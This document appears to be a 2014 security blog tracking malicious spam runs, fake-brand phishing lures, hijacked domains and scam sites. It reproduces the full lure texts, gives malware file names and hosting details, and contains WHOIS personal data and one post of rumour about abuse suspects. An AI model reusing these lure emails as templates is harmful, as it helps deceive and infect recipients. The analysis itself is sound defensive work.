Thursday, 31 July 2014

"Scanned Image from a Xerox WorkCentre" spam

This is a thoroughly old school spam with a malicious attachment.

Date:      Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
From:      Local Scan [scan.614@victimdomain]
Subject:      Scanned Image from a Xerox WorkCentre

You have a received a new image from Xerox WorkCentre.

Sent by: victimdomain
Number of Images: 5
Attachment File Type: ZIP [PDF]

WorkCentre Pro Location: Machine location not set
Device Name: victimdomain

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL:

Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contain a malicious executable Image_07312014.scr, scoring a measly 1/54 at VirusTotal.

The Comodo CAMAS report shows that the malware downloads components from the following locations:

There are some further clues in the VirusTotal comments as to what the malware does. Sophos has also seen the (OVH, France) IP before.

Recommended blocklist:

Evernote "File has been sent" spam

I've never understood Evernote. Something to do with elephants I think. But this spam isn't from them anyway..
Date:      Thu, 31 Jul 2014 12:26:53 +0200 [06:26:53 EDT]
From:      EVERNOTE []
Subject:      File has been sent [redacted]

DSC_9426679.jpg attached to the letter
Copyright 2014 Evernote Corporation. All rights reserved
The file attached is actually and not .jpg, containing a malicious executable DSC_8832966.exe with a VirusTotal detection rate of 7/53. The CAMAS report shows that the malware attempts to download an additional component from the following locations:

These download locations are the same as yesterday's Amazon spam run. The downloaded file has a VT detection rate of 3/53.

The recommended blocklist is the same as yesterday.

"New fax" spam using shortening service

Here are a couple of variations of a fax spam using the shortening service:

From:     Fax [fax@victimdomain]
Date:     31 July 2014 11:23
Subject:     You've received a new fax

New fax at SCAN5735232 from EPSON by https://victimdomain
Scan date: Thu, 31 Jul 2014 19:23:11 +0900
Number of pages: 2
Resolution: 400x400 DPI

You can download your fax message at:

(Google Disk Drive is a file hosting service operated by Google, Inc.)


From:     FAX []
Reply-to:     FAX []
Date:     31 July 2014 10:53
Subject:     You have received a new fax message

You have received fax from EPS76185555 at victimdomain
Scan date: Thu, 31 Jul 2014 16:53:10 +0700
Number of page(s): 2
Resolution: 400x400 DPI

Download file at google disk drive service - dropbox.

File is scanned image in PDF format.
Adobe(A) Reader(R) can be downloaded from the following URL:
There seems to be an uptick of spam.. if you receive something like this you can report it to as malware.

I've seen three different URLs:

These lead to the following download locations:

Obviously, this is a ZIP file. It contains a malicious executable Document-95722.scr which has a VirusTotal detection rate of just 1/54. The CAMAS report shows that the malware reaches out to the following locations to download further components:

Incidentally, if you add a "+" to the end of the URL you can see how many people have clicked through. For example:

164 clicks isn't a lot, but there are multiple URLs in use.

Recommended blocklist:

Wednesday, 30 July 2014

"Payslip" spam

Presumably terseness works with this kind of message:

From:     Richard Mason []
Date:     30 July 2014 21:23
Subject:     Payslip

Please find attached the payment slip.
Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

Clicking OK downloads an executable from which your are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..

..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded.

Content-Type: text/html; charset=US-ASCII; name="swift copy-Payment-Slip-$70,000.html"
Content-Disposition: attachment;
    filename="swift copy-Payment-Slip-$70,000.html"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_hy93oezq0

The malware itself has a VirusTotal detection rate of 31/53 which is frankly better than I'd expect. Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter:

"AMAZON.CO.UK - Your Amazon order" spam

Another fake Amazon spam with a malicious payload:
Date:      Wed, 30 Jul 2014 18:08:43 +0800 [06:08:43 EDT]
From:      "AMAZON.CO.UK" []
Subject:      Your Amazon order #853-9908013-4362599


Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on
Order Details

Order #853-9908013-4362599 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.

 There's a ZIP file attached (in this case which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53. The Comodo CAMAS report shows that it downloads a further component from these following locations:

This second executable has a VT detection rate of 5/54. I recommend blocking the following sites:

"Order status -950533 30.07.2014.xls" spam

This body-text-less spam comes with a malicious attachment.

Date:      Wed, 30 Jul 2014 17:06:27 +0530 [07:36:27 EDT]
From:      Twila Garner []
Subject:      Order status -950533 30.07.2014.xls
Actually the body text isn't completely blank but does contain some bits of HTML.


    <XSSCleaned_taghttp-equiv="content-type" content="text/html; charset=UTF-8">
  <body text="#000000" bgcolor="#FFFFFF">

But the payload is the thing, in this case there is an archivecalled containing a folder order-8301138-30.07.2014.xls which in turn contains a malicious executable order-8301138-30.07.2014.xls.exe which has a VirusTotal detection rate of 6/54.

The Comodo CAMAS report shows attempted downloads from the following connections:

A second file is downloaded from these locations with a VT detection rate of just 2/54. The CAMAS report is inconclusive.

I recommend the following blocklist:

QuickBooks "Important - Payment Overdue" spam has a malicious PDF attachment

This fake QuickBooks Invoice spam comes with a malicious payload:

From:     QuickBooks Invoice []
Date:     29 July 2014 23:08
Subject:     Important - Payment Overdue

Please find attached your invoices for the past months. Remit the payment by 07/30/2014 as outlines under our "Payment Terms" agreement.

Thank you for your business,

Josephine Shirley

This e-mail has been sent from an automated system.  PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.
The attached file (in this case invoice_7564675_07292014.pdf) contains an exploit with a VirusTotal detection rate of 7/53. I haven't had a chance to analyse the exploit myself yet.

Tuesday, 29 July 2014

Infographic: Operation Yewtree vs Operation Fernbridge arrests

Two broadly equivalent investigations into child abuse rings, Operation Yewtree and Operation Fernbridge have had very different outcomes.

Yewtree has seen arrests of several high-profile people involved in the media, the majority of whom have not been found guilty of anything. But the rumoured suspects in Fernbridge include politicians, civil servants, judges and leaders of industry as well as a pop star or two. Why are the current outcomes looking so different?

(click graphic to enlarge)

Something evil on,, and (

I don't know quite what the exploit kit of the month is here, but the IP addresses,, and are currently serving up malware using hijacked GoDaddy domains, and are targeting victim websites by altering their .htaccess files to intercept traffic coming from search engines such as Google.

These IP addresses have been used for malware for some time and certainly historically they have been used for Ponmocup. I can't confirm that this is still the case, but given the bad IP and the obvious .htaccess hijack then it passed the Duck Test.

These IPs are allocated to Radore Veri Merkezi Hizmetleri A.S. in Turkey who control which is a large block, so these IPs are probably a customer or even a customer of a customer.

VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation which I would very strongly recommend blocking that range, or indeed the entire /24 looks pretty worth

These domains all use the GoDaddy nameservers, which naturally means most of them are GoDaddy domains.. but not all of them, some are from other registrars. This list [pastebin] includes a selection of active subdomains that I can find.

I recommend permablocking the following IP range and temporarily blocking the following domains:

Note that the following domains have been cleaned up and are probably now safe.

Monday, 28 July 2014 "Your Amazon order" spam

This fake Amazon spam comes with a malicious attachment:

Date:      Mon, 28 Jul 2014 13:15:57 +0200 [07:15:57 EDT]
From:      "AMAZON.CO.UK" []
Subject:      Your Amazon order #239-1744919-1697181


Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on
Order Details

Order #239-1744919-1697181 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.

Attached is a file which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54.

The Comodo CAMAS analysis shows that the malware reaches out to a familiar set of URLs to download further components:

I would recommend blocking the following domains:

Something evil on (Ransomware) (Hetzner, Germany) is infected with a whole bunch of ransomware landing pages, like this:

In the past this IP range has been used to host a number of legitimate Austrian sites, but at the moment it appears to be hosting ransomware landing pages exclusively.

The domains in use are a combination of crappy .in domains registered to a series of fake addresses, plus a bunch of subdomains of legitimate domains that have been hijacked. What is interesting about these hijacked domians is that they all use as namerservers.

This hijacking at is because these particular domain users are using the free service which allows anyone to create a subdomain of your domain and point is where they like (explained in this FAQ). The bad news is that this sort of hijacking is a quick way to ruin your domain's reputation. A full list of the subdomains and domain I can find is here [pastebin].

Although this is a Hetzner IP, it is suballocated to a customer who may or may not know anything about this abuse of the IPs in the range:

inetnum: -
netname:        ANDY-CONTE
descr:          Andy Conte
country:        DE
admin-c:        DS15036-RIPE
tech-c:         DS15036-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
source:         RIPE # Filtered

person:         Dmitry Seleznev
address:        Ivana Franko 38-364
address:        121351 Moscow
address:        RUSSIAN FEDERATION
phone:          +79270473970
nic-hdl:        DS15036-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

Blocking these landing pages will probably not stop a PC from becoming infected with ransomware, but monitoring or blocking the following list may give you some intelligence as to what is happening on your own network.

Recommended blocklist:

Saturday, 26 July 2014

"PLEASE SEND PI" spam / something evil on

"PI" in this case seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.

Date:      Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
Subject:      PLEASE SEND PI


Regarding our previous conversation about our urgent purchase, kindly
find attached PI and let us know if the quantity can fit in 40ft
kindly revise the Proforma invoice so that we can proceed with an
advance payment as agreed.

We look forward to your urgent response with revised proforma invoice.

Thks & Rgds,
Tel : 0097143205171
Fax : 0097143377150 
It sounds like a fiendish maths question from an obscure exam. How much Π can you fit in a 40ft container? Anyway, the attachment contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53. The ThreatExpert report [pdf] and ThreatTrack report [pdf] show that the malware phones home to on (OVH Canada reassigned to Big Kesh, LLC, US).

Looking at the domains registered on and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs: [1] [2] [3] [4] [5] [6] [7] [9] [10] [11] [12]

I think this is enough evidence to block the entire as a precaution (although there do appear to be a small number of legitimate sites too). For the record, this is suballocated to:

NetRange: -
OriginAS:       AS16276
NetName:        OVH-CUST-445017
NetHandle:      NET-198-27-110-192-1
Parent:         NET-198-27-64-0-1
NetType:        Reassigned
RegDate:        2014-03-07
Updated:        2014-03-07

CustName:       Big Kesh, LLC
Address:        1077 Jearsey ln ne
City:           Palm Bay
StateProv:      FL
PostalCode:     32905
Country:        US
RegDate:        2014-03-07
Updated:        2014-03-07

In the case of Big Kesh LLC I will be charitable and assume that this behaviour is happening without their consent.

The domains and appear to be used for purely malicious purposes, so I recommend that you block them. The registrant details are probably fake but here they are:
Registrant ID:                               06BFAFB5641FA567
Registrant Name:                             Xieng Hyua
Registrant Address1:                         Red Bulevard
Registrant City:                             North Bergen
Registrant State/Province:                   NJ
Registrant Postal Code:                      07047
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.6874598745
Registrant Email:                  
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11
Registrant ID:                               0121C76442E2ED55
Registrant Name:                             Jackson Togan
Registrant Address1:                         Zhongzeng District 100
Registrant City:                             Zhongzeng District
Registrant State/Province:                   Zhongzeng District
Registrant Postal Code:                      100
Registrant Country:                          TAIWAN, PROVINCE OF CHINA
Registrant Country Code:                     TW
Registrant Phone Number:                     +92.68974568
Registrant Email:                  
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11

Recommended blocklist:

Friday, 25 July 2014

"eFax message" spam

Another tired old spam template leading to malware..

From:     eFax Corporate []
Date:     25 July 2014 14:25
Subject:     eFax message - 4 pages

Fax Message [Caller-ID: 948-468-7596]

You have received a 4 pages fax at 2014-07-25 13:24:21 GMT.

* The reference number for this fax is latf1_did11-1187609582-1911573644-58.

View this fax using your PDF reader.

Click here to view this message

Please visit if you have any questions regarding this message or your service.

Thank you for using the eFax service!
Home | Contact | Login |
Powered by j2

2014 j2 Global Communications, Inc. All rights reserved.
eFax is a registered trademark of j2 Global Communications, Inc.

This account is subject to the terms listed in the eFax Customer Agreement.

In this case the link in the email goes to which downloads a file with a VirusTotal detection rate of just 1/45. Automated analysis [pdf] is fairly inconclusive as to what it does.

Tiffany & Co "invoice 0625859 July" spam

This fake Tiffany & Co email has a malicious attachment:

Date:      Fri, 25 Jul 2014 17:32:38 +0800 [05:32:38 EDT]
From:      "J.Parker" []
Subject:      invoice 0625859 July

Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.

Tiffany & Co.
Attached to the message is an archive invoice which contains a folder invoice copy in which there is a malicious file invoice copy.exe which has a VirusTotal detection rate of 9/51. The CAMAS report shows that the malware downloads components from the following locations:

Those sites are similar to the one found in the recent "Birmingham Mail" spam run. I recommend that you block the following domains on your network:

"Help & Advice - Virgin Media Business" / Virginmedia Business spam

A bit of a malspam tsunami today, this fake email claims to be from Virgin Media Business.

Date:      Fri, 25 Jul 2014 19:57:24 +0700 [08:57:24 EDT]
From:      Virginmedia Business []
Reply-To:      Legal Aid Agency []

Virgin Media Automated Billing Reminder

Date 25th July 2014

This e-mail has been sent you by Virgin Media to inform you that we were
unable to process your most recent payment of bill. This might be due to
one of the following reasons:

    A recent change in your personal information such as Name or address.
    Your Credit or Debit card has expired.
    Insufficient funds in your account.
    Cancellation of Direct Debit agreement.
    Your Card issuer did not authorize this transaction.

To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.

Please fulfill attached form and send it back to our email adress.

Please ensure all address and contact details are up to date, once submitted your account details will automatically be updated within 24 Hours.

Kind Regards,

Virgin Media

Customer Services Team

Ellis Willis

Attached is an archive file which in turn contains a folder billing_form91_4352-2105.pdf which in turn contains a malicious executable billing_form91_4352-2105.pdf.scr which has a VirusTotal detection rate of 3/53. The Comodo CAMAS report indicates that is is largely the same in behaviour as this HMRC malware from earlier today.

HM Revenue and Customs "Notice of Underreported Income" spam

The second HMRC spam run of the day, this one contains a malicious link.
From:     HM Revenue and Customs []
Reply-To:     HM Revenue and Customs []
Date:     25 July 2014 12:19
Subject:     Notice of Underreported Income

Taxpayer ID: ufwsd-000007954108UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form here.
In this case the link in the email goes to which the user is expected to download and run. It has a VirusTotal detection rate of 3/51. Automated analysis tools are pretty inconclusive [1] [2] [3] but do reveal some of the behavioural activity.

HMRC "Tax Notice July 2014" spam

This fake HMRC tax notice comes with a malicious attachment:

Date:      Fri, 25 Jul 2014 16:48:37 +0900 [03:48:37 EDT]
From:      HMRC Revenue&Customs []
Reply-To:      Legal Aid Agency []

Dear [redacted] ,

Please be advised that one or more Tax Notices (P6, P6B) have been issued.

For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 34320-289.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
2014 © All rights reserved

Attached is a file which unZips to a folder called P6_rep(9432)_84632_732.doc which contains a malicious executable P6_rep(9432)_84632_732.doc.scr which has a VirusTotal detection rate of 4/53.

The CAMAS report shows that a second component is downloaded from which in turn has a VirusTotal detection rate of 5/52.

The IP address of is in the same /24 as the two other IPs mentioned here. I would very strongly recommend blocking traffic to at least or the whole range (although there do seem to be some legitimate Russian-language sites in there). The IP belongs to:

inetnum: -
netname:        COMFORTEL-NET
descr:          COMFORTEL ltd.
country:        RU
admin-c:        ME3174-RIPE
tech-c:         RASS-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     MNT-PIN
mnt-domains:    PIRIX-MNT
source:         RIPE # Filtered

person:         Mikhail Evdokimov
address:        PIRIX
address:        Obukhovskoy Oborony, 120-Z
address:        192012, St.Petersburg
address:        Russia
phone:          +7 812 3343610
fax-no:         +7 812 6002014
nic-hdl:        ME3174-RIPE
mnt-by:         RUNNET-MNT
source:         RIPE # Filtered

person:         Dmitry Rassohin
address:        194156, St.Petersburg, Russia
address:        Bolshoy Sampsonievskiy prospekt 106A, apt. 304
phone:          +7 931 2700021
nic-hdl:        RASS-RIPE
mnt-by:         RASS-MNT
source:         RIPE # Filtered

descr:          PIRIXROUTE
origin:         AS56534
mnt-by:         MNT-PIN
source:         RIPE # Filtered abused by spammers

I noticed a whole load of queries in URLquery about (such as this one) which I thought to be kind of odd..

"Adminsecret" sounds really interesting from a security perspective, but really it's a site aimed at executive assistants and people with similar roles.

The pages being queries are "articles" that look like this:

This doesn't look very much like a tip on how to be a better admin. There also appears to be a webspam campaign active to drive traffic to these sites:

So a mix of payday loans and movie downloads. So let's go back to this "Blended Movie Online" page with the prominent "Watch Now" button. This actually takes you to a site that tantalisingly waves another "download" button at you.

Clicking "Download Now" leads you into a cesspit of adware. Instead of getting a move, you are directed to dowload a file Blended.exe from Of course, this isn't a move file at all, but some piece of crappy adware with a VirusTotal detection rate of 17/51 (mostly detected as InstallRex).

Various analysis tools [1] [2] [3] piece together what this adware does, but from a network point of view it makes a connection to the following domains:

This last one is the clue as to who is making this adware, registered to:

descr: LTD
descr:        Harbel 10
descr:        Oranit Israel
descr:        4481300
descr:        Israel
phone:        +972 72 2124145
fax-no:       +972 72 2124145
e-mail:       admin AT allows you to make your own browser extensions. Hmm. Looks like a good candidate to block if you don't want unauthorised BHOs and the like.

So, for this particular issue I would recommend the following blocklist:

Back to the site, if you want to watch the movie online instead of downloading it you get redirected to which is some sort of movie subscription service based in the British Virgin Islands. Frankly you'd be better off with Netflix, Amazon, Google or some other reputable service.

Oh yes.. and there's payday loan crap too:

So right now I would say that is horribly compromised and is probably a good candidate for blocking until they get the issues sorted out.

UPDATE: emails to info -at- bounce, so far I have not been able to contact them.

Thursday, 24 July 2014

Scam: "" is not The Brunner Investment Trust PLC

This simple spam is backed up by a fairly sophisticated fake website.

From:     brunner investment []
To:     50
Date:     24 July 2014 12:08


The Brunner Trust PLC, is working on expanding its international portfolio Globally and financing projects in form of debt financing from the tune of $1million to $500million,
we also offer personal and business loans from the tune of $100,000 USD to $1,000,000.00 USD

We would be happy to receive an Executive summary to see if you have any Viable project we can finance and partner together
by making financial investment in Form of soft loans.

Email your projects summary to us at:

Stefan Hofrichter
Chief Economist and Head of Global Economics & Strategy
The Brunner Investment Trust PLC is a real organisation with a website at - the domain that the spammers are soliciting replies to is (note the missing "n" in "brunner"). It was registered on 31st May 2014 with anonymous WHOIS details.

This is the real Brunner Invesment Trust site:

And this is the fake one:

The differences are subtle:

Of course the main purpose of the web site is to encourage you to think that you are talking to a real person, to which end the contact details are completely fake:

Although the postal address is correct, the rest of the details are fake:

Brunner Investment Trust Plc
199 Bishopsgate,
London, EC2M 3TY
Tel:+44 703 195 6304
Tel/Fax: +44 745 227 1933
The telephone numbers quotes appear to be "follow me anywhere" numbers that forward to another number, which could be anywhere in the world.

So what's the scam? Well, there's probably an up-front fee to even discuss financing.. and if it's like this recent scam it could be tens of thousands of dollars. Of course, there is no financing available (remember that this is a fake site, not the Brunner Investment Trust) and once the scammers have your money they will vanish.

I note as well that the site is fairly well done although somewhat buggy (and it randomly pops up adverts) which looks rather like the same cloned websites I discussed earlier this month.

Some technical details for this - the site is hosted on which is allocated to Hostinger International in Lithunia (although the servers might be in Amsterdam). The spam originates from (Botswana Telecommunications Corporation) via an unknown mail relay on (Telecom Italia, Verona, Italy).


"You have received a new VoiceMail" spam

This tired old malware spam is doing the rounds again.

From:      Voice Mail [voicemail_sender@local]
Subject:      You have received a new VoiceMail
Date:      Thu, 24 Jul 2014 17:31:25 +0700 [06:31:25 EDT]

You have received a voice mail message.
Message length is 00:03:27. 
As you might expect, the attachment does not contain a voice mail at all, but it is a malicious executable VoiceMail.scr which has a a VirusTotal detection rate of 3/53.

The CAMAS report and Anubis report shows the malware downloading an encrypted file from the followng locations:

Blocking those sites may give some protection against this malware.

NatWest "You have received a secure message" spam

This spam contains a link going to a malicious file:

From:     NatWest []
Date:     24 July 2014 14:06
Subject:     You have received a new secure message

You have received a secure message

To read your secure message click here . You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.

If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2568.
First time users - will need to register after opening the attachment.

About Email Encryption -
Another version uses the telephone number 0131 556 2164.

There are probably several different versions, in the ones I have the download location is:

This malware has a VirusTotal detection rate of 6/52. Automated analysis tools are inconclusive [1] [2] as to what it does.